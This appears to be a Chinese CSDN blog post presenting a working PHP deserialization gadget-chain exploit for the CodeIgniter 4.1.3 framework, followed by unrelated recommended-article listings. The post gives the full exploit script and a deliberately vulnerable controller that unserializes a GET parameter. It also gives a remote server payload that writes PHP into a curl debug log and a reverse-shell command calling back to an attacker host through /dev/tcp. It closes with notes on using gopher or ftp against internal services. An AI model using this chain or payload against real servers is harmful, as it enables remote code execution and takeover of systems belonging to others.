codeigniter 4.1.3 gadget chain

最新推荐文章于 2024-05-16 20:42:16 发布
最新推荐文章于 2024-05-16 20:42:16 发布
阅读量216 收藏
点赞数
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/why811/article/details/133860460
版权

EXP code

找到一条很有意思的codeigniter框架的链。

<?php
namespace CodeIgniter\HTTP {
    class CURLRequest {
        protected $config = [
            "debug" => "./eee.php"
        ];
    }
}

namespace CodeIgniter\Session\Handlers {
    class MemcachedHandler{
        public function __construct($memcached, $url){
            $this->memcached = $memcached;
            $this->lockKey = $url;
        }
    }
}

namespace CodeIgniter\Cache\Handlers {
    class RedisHandler{
        public $redis;
        public function __construct($redis){
            $this -> redis = $redis;
        }
    }
}


namespace {
    $ip = $argv[1];
    $port = $argv[2];
    $exp = array(
        new \CodeIgniter\Cache\Handlers\RedisHandler(
            new \CodeIgniter\Session\Handlers\MemcachedHandler(
                new \CodeIgniter\HTTP\CURLRequest(),
                "http://$ip:$port/"
            )
        )
    );


    echo urlencode(serialize($exp));
}

复现

下载最新的CodeIgniter框架,将以下代码写入app/controller/Home.php

<?php
namespace App\Controllers;

class Home extends BaseController
{
    public function index()
    {
        $obj = @unserialize($_GET['obj']);
        var_dump($obj);
        return view('welcome_message');
    }
}

准备一个远程服务器,并填入php代码<?php header("X-Powered-By: <?php phpinfo();");index.php。之后在index.php所在目录启动一个简单的php http服务器。

执行上述exp并复制exp的输出。

php exp.php remote_server_ip remote_server_port

在本地启动CodeIgniter框架,将exp的输出粘贴到obj参数中。然后,此exp将发送请求到远程服务器,并在本地写入eee.php。访问eee.php将执行phpinfo。

漏洞原理

新gadget的起始向量仍然是CodeIgniter\Cache\Handlers\RedisHandler::__destruct方法。

public function __destruct()
{
    if (isset($this->redis))
    {
        $this->redis->close();
    }
}

redis设置为CodeIgniter\Session\Handlers\MemcachedHandler'类的对象,然后我们跳到CodeIgniter\Session\Handlers\MemcachedHandler::close方法。

public function close(): bool
{
    if (isset($this->memcached))
    {
        isset($this->lockKey) && $this->memcached->delete($this->lockKey);
        ...

lockKey分配给一个特别准备的远程服务器ip,memcached分配给一个CodeIgniter\HTTP\CURLRequest类的对象,这个对象,在config中设置debug选项为一个php文件。

之后我们将跳到CodeIgniter\HTTP\CURLRequest::delete方法。

public function delete(string $url, array $options = []): ResponseInterface
{
    return $this->request('delete', $url, $options);
}

这个方法将http请求发送到设置的远程服务器。并且后续的调用将设置$curlOptions[CURLOPT_STDERR]为我们之前指定的php文件。设置$curlOptions的方法是CodeIgniter\HTTP\CURLRequest::setCURLOptions

protected function setCURLOptions(array $curlOptions = [], array $config = [])
{
...
    if ($config['debug'])
    {
        $curlOptions[CURLOPT_VERBOSE] = 1;
        $curlOptions[CURLOPT_STDERR]  = is_string($config['debug']) ? fopen($config['debug'], 'a+') : fopen('php://stderr', 'w');
    }
...
}

设置好的远程服务器将对发出的请求作出响应,并在响应头中返回一段php代码。这段php代码会被写入我们指定的curl日志文件中,也就是那个php文件。

远程服务器上的index.php。

<?php
header("X-Powered-By: <?php system('bash -c \"bash -i >& /dev/tcp/ip/port 0>&1\"');?>");

恶意的curl日志文件。

* Expire in 0 ms for 6 (transfer 0x???)
*   Trying ???...
* TCP_NODELAY set
* Expire in 200 ms for 4 (transfer 0x???)
* Connected to ??? (???) port ??? (#0)
> DELETE / HTTP/1.1
Host: ???
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

< HTTP/1.1 200 OK
< Host: ???
< Date: Thu, 26 Aug 2021 06:07:19 GMT
< Connection: close
< X-Powered-By: <?php system('bash -c "bash -i >& /dev/tcp/ip/port 0>&1"');?>
< Content-type: text/html; charset=UTF-8
< 
* Closing connection 0

影响

  1. 如上所示,这可能导致恶意的php文件被写入服务器,导致攻击者获取服务器权限。
  2. 当攻击者无法写入恶意文件时,他可以用gopher或ftp协议代替上述http协议来攻击内网服务。
why811
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CodeIgniter-4.3.6
08-23
CodeIgniter-4.3.6
codeigniter支持php版本,CodeIgniter与PHP版本的兼容性?
weixin_33509600的博客
03-10 454
我使用CodeIgniter 2.2.6与PHP 5.5,它工作正常.现在我想将PHP升级到5.6.6版我的问题是,CodeIgniter是否与PHP 5.6.6兼容?我无法将CodeIgniter升级到新版本,因为我有很多基于2.2.6版本的模型.解决方法:用户指南中的Server Requirements页面说CodeIngiter 2需要“PHP 5.1.6或更高版本”.I can’t up...
php codeigniter3,codeigniter
weixin_36403128的博客
03-17 167
codeigniter是针对php开发者打造的一款免费框架,它为开发者提供了丰富的工具,可以方便开发者快速完成WEB应用的架构,它内置了丰富的类库供大家选择,是您开发各类PHP应用程序的不二选择。codeigniter的入门非常容易,官方还提供了开发手册供大家参考,有学习PHP开发的快快下载吧。codeigniter特色* 基于 MVC 体系* 超轻量级* 对数种数据库平台的全特性支持的数据库类*...
Codeigniter 升级
weixin_39709920的博客
12-08 212
Codeigniter 版本号查看: 在系统文件:system/core/CodeIgniter.php define('CI_VERSION', '2.1.3'); 1. 替换掉system目录下所有的文件和文件夹,以及替换掉index.php 都换成新的 2. controllers和models中的文件首字母都需要改成大写:application.php -> Application.php, m_application.php -> M_application.php .
codeigniter配置
weixin_39709920的博客
12-10 156
#配置文件 application/config/config.php #路由跳转域名的配置 $config['base_url'] = 'http://ci.com/';
CodeIgniter v3.1.1
12-04
CodeIgniter 是一个小巧但功能强大的 PHP 框架,作为一个简单而优雅的工具包,它可以为 ...如果你是一个使用共享主机,并且为客户所要求的期限而烦恼的开发人员,如果你已经厌倦了那些傻大笨粗的框架 CodeIgniter 是为
CodeIgniter v3.1.5
11-30
CodeIgniter 是一个小巧但功能强大的 PHP 框架,作为一个简单而优雅的工具包,它可以为 PHP 程序员建立功能完善的 Web 应用程序。如果你是一个使用共享主机,并且为客户所要求的期限而
CodeIgniter框架URL路由总结
10-25
主要介绍了CodeIgniter框架URL路由总结,本文也以作为CodeIgniter路由入门教程,讲解了配置规则的几个方面,需要的朋友可以参考下
CodeIgniter使用phpcms模板引擎
10-26
本文介绍CodeIgniter如何使用phpcms的view模板解析功能
Android----USB通信
工宗浩生财指南针
05-13 314
Android开发中实现USB通信,通常涉及到与USB设备的交互,包括请求设备权限、与设备通信等步骤。
Jenkins android 自动打包安卓 centos8.5 运维系列五
tonyhi6的博客
05-11 221
Jenkins android 自动打包安卓 centos8.5 运维系列五
掌握Android Intent与IntentFilter的艺术-深入探索匹配规则与实践技巧
w风雨无阻w的专栏
05-14 695
动作匹配Intent中必须包含中声明的至少一个动作。类别匹配Intent中的所有类别必须与中的类别完全一致。数据匹配Intent中的数据必须与中的至少一个数据匹配。假设我们有一个网页浏览器应用,我们希望当用户尝试打开一个http或https协议的网页时,我们的应用能够被系统选中。我们可以在中为相应的Activity定义如下当用户点击一个网页链接时,系统会查找所有能够响应VIEW动作和BROWSABLE类别的组件,并且检查它们的<data>元素是否匹配链接的协议。在这个例子中,我们的将能够响应所有。
android xml 定义渐变色背景
dengfuma的专栏
05-11 349
android xml 定义渐变色背景
Android Model引入其他aar包 导致无法打包成aar
最新发布
qq_27400335的博客
05-16 232
Android Model引入其他aar包 导致无法打包成aar
Android 桌面小组件 AppWidgetProvider(2)
fromVillageCoolBoy的博客
05-14 420
然后再组件中,发送广播,就能在onReceive中收到消息,然后做相应的处理就好。然后onReceive处理消息。1.1 添加小组件的生命周期。1.2 移除小组件的生命周期。要想小组件有动画效果,就需要。这个问题解决方案的关键是。这里简单的举一个例子。2.怎么处理点击事件。4.怎么处理动画效果。
Android PreferenceActivity可以自动设置的Activity
结合项目案例,记录点点滴滴,自己回顾,分享他人o__o
05-14 531
PreferenceActivity 是一个抽象类,继承自ListActivity ,该类封装了SharedPreferences.PreferenceActivity 提供了一些常用的设置项如,与普通组件一样,这些配置项既可以从XML文件创建,也可以从代码创建.每一个设置项标签有一个android:key属性,该属性的值就是保存在XML文件中的key-value对中的key.
android 界面布局中图片按键的实现
qq_31397725的博客
05-16 416
Android界面布局中实现图片按键,通常可以通过ImageButton或者ImageView结合OnClickListener来完成。
uni-app安卓本地打包个推图标配置
李浩洋
05-07 342
uniapp安卓本地打包个推图标配置。如果什么都不配置,默认的就是个推小鲸鱼图标。
codeigniter post
08-16
CodeIgniter框架中,获取POST参数可以使用$_POST['key']来获取。此外,CodeIgniter还封装了一个Input类,可以使用$this->input->post('key')来获取POST提交过来的数据。例如,可以使用以下代码来获取POST参数: $key = $_POST['key']; 或者 $key = $this->input->post('key'); 其中,'key'是要获取的POST参数的键名。这样就可以获取到相应的POST参数了。 另外,CodeIgniter还提供了获取GET参数的方法。可以使用$this->input->get('key')来获取GET参数。这样可以方便地获取到URL中的GET参数。 总结起来,CodeIgniter框架中可以通过$_POST['key']、$this->input->post('key')获取POST参数,通过$this->input->get('key')获取GET参数。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CI框架获取post和get参数_CodeIgniter心得](https://blog.csdn.net/lishk314/article/details/48240607)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [在CodeIgniter中检索JSON POST数据](https://blog.csdn.net/weixin_39954674/article/details/115108581)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值